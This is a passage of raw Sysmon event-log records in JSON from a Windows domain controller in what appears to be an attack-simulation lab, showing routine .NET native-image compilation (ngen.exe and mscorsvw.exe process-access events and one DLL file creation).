C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.334","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-001033E81000}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.350\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-001033E81000}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.350","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-001033E81000}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.381\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AC-5F25-0000-00109E7E1000}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.381","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AC-5F25-0000-00109E7E1000}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.381\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AC-5F25-0000-00109E7E1000}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.381","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AC-5F25-0000-00109E7E1000}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.397\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010E1EB1000}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.397","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010E1EB1000}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:24.475\r\nProcessGuid: {41C8662E-22BC-5F25-0000-0010E1EB1000}\r\nProcessId: 2608\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\System.Xaml.Hosting.dll\r\nCreationUtcTime: 2020-08-01 08:07:24.475","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:24.475","ProcessGuid":"{41C8662E-22BC-5F25-0000-0010E1EB1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a30-0\\System.Xaml.Hosting.dll","CreationUtcTime":"2020-08-01 08:07:24.475","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.506\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00101CF11000}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.506","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00101CF11000}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.506\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00101CF11000}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.506","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00101CF11000}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.506\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00101CF11000}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.506","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00101CF11000}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.554\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00108BF41000}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 